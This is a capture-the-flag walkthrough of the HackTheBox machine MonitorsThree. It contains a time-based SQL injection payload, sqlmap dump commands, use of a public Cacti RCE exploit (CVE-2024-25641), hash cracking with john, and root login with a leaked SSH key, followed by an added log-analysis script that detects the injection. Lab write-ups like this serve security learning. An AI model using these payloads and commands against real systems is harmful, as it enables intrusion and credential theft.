MonitorsThree (HTB – Medium)

The machine hosts a Cacti monitoring instance on a hidden subdomain. A time‑based SQL injection on the main site reveals valid credentials, allowing login to Cacti. Cacti 1.2.26 is vulnerable to authenticated RCE (CVE‑2024‑25641). Privilege escalation is achieved by discovering that the SSH private key for marcus actually belongs to root.

Overview

Target: monitorsthree.htb
Initial vector: SQL injection → admin credentials
Privilege escalation: leaked root SSH key

Enumeration

Initial enumeration of monitorsthree.htb reveals nothing useful. Directory fuzzing shows only static assets.

Virtual host fuzzing:

$ ffuf -u http://monitorsthree.htb -H "Host: FUZZ.monitorsthree.htb" \
  -w directory-list-2.3-medium.txt -fs 13560
-> cacti.monitorsthree.htb

Add the subdomain to /etc/hosts and browse it:

http://cacti.monitorsthree.htb
-> Cacti 1.2.26

Cacti 1.2.26 is known to be vulnerable to authenticated RCE (CVE‑2024‑25641), but credentials are needed first.

SQL Injection – Main Site

The main site contains a password reset form:

http://monitorsthree.htb/forgot_password.php

Testing with a single quote reveals SQL injection. A time‑based payload confirms it:

username=admin' AND IF(SUBSTRING(database(),13,1)='e',SLEEP(2),NULL)-- -

Use sqlmap to automate extraction:

$ sqlmap -r req_2.txt --batch --dbs
$ sqlmap -r req_2.txt -D monitorsthree_db --tables
$ sqlmap -r req_2.txt -T users --dump

Recovered credentials:

admin : greencacti2001

These work on both the main site and the Cacti panel.
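
Detection sketch for the time-based extraction above (an added example, not part of the original write-up or of any tool it uses): the POST body never reaches an access log, so the check relies on response timing, where one client's requests to one endpoint split into fast answers and answers held at a near-constant delay. It assumes an nginx "combined" log with $request_time appended as the last field; the function names, thresholds and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed log format: nginx "combined" with $request_time appended as last field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3} \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" (?P<rt>\d+\.\d+)$')

def find_time_based_probing(log_text, min_requests=6, min_delay=1.0, spread=0.3):
    """Flag (client, path) pairs whose response times split into a fast group
    and a slow group sitting at one near-constant delay (the SLEEP value)."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            key = (m["ip"], m["path"].split("?")[0])
            groups[key].append((float(m["rt"]), m["ua"]))
    findings = {}
    for key, reqs in groups.items():
        reasons = []
        if any(ua.lower().startswith("sqlmap/") for _, ua in reqs):
            reasons.append("sqlmap default User-Agent")
        times = [rt for rt, _ in reqs]
        base = min(times)                      # fastest answer = baseline
        slow = [t for t in times if t - base >= min_delay]
        fast = len(times) - len(slow)
        if (len(times) >= min_requests and fast >= 2 and len(slow) >= 2
                and max(slow) - min(slow) <= spread):
            delay = sum(slow) / len(slow) - base
            reasons.append(f"{len(slow)}/{len(times)} responses delayed by ~{delay:.1f}s")
        if reasons:
            findings[key] = reasons
    return findings

def _line(ip, path, ua, rt):  # builds one constructed log line
    return (f'{ip} - - [01/Sep/2024:10:00:00 +0000] "POST {path} HTTP/1.1" '
            f'200 512 "-" "{ua}" {rt:.3f}')

# Constructed sample traffic (documentation addresses, not taken from the box).
SAMPLE_LOG = "\n".join(
    [_line("198.51.100.7", "/forgot_password.php", "Mozilla/5.0", rt)
     for rt in (0.021, 2.019, 0.018, 0.024, 2.031, 2.022, 0.019, 2.027)] +
    [_line("203.0.113.9", "/forgot_password.php", "Mozilla/5.0", rt)
     for rt in (0.030, 0.025)] +
    [_line("203.0.113.20", "/login.php", "Mozilla/5.0", rt)
     for rt in (0.040, 1.300, 0.035, 3.900, 0.050, 0.045)])

if __name__ == "__main__":
    for (ip, path), why in find_time_based_probing(SAMPLE_LOG).items():
        print(ip, path, "; ".join(why))
```

The third client in the sample has slow responses too, but they do not cluster at one delay, so ordinary backend slowness is not flagged.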

Foothold – Cacti 1.2.26 RCE

Use a public exploit:

https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26

Run it:

$ python3 exploit.py -u admin -p greencacti2001

A shell is obtained as the web user.

Database Enumeration

Cacti database credentials are stored in the application directory:

cactiuser : cactiuser

Connect to MariaDB:

MariaDB [cacti]> select * from user_auth;

Relevant entry:

marcus : $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK

Crack it:

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
-> 12345678910

Switch user:

$ su marcus

Privilege Escalation

Inside /home/marcus is an SSH private key:

id_rsa

However, the key does not belong to marcus — it belongs to root. Copy it to the attacker machine and set permissions:

$ chmod 600 id_rsa
$ ssh -i id_rsa root@monitorsthree.htb

Root access obtained.

Conclusion

MonitorsThree combines a simple time‑based SQL injection with an authenticated Cacti RCE. After dumping credentials from the database and exploiting Cacti, the final privilege escalation is achieved by discovering that the SSH private key in marcus’s home directory actually belongs to root. This provides immediate full system compromise.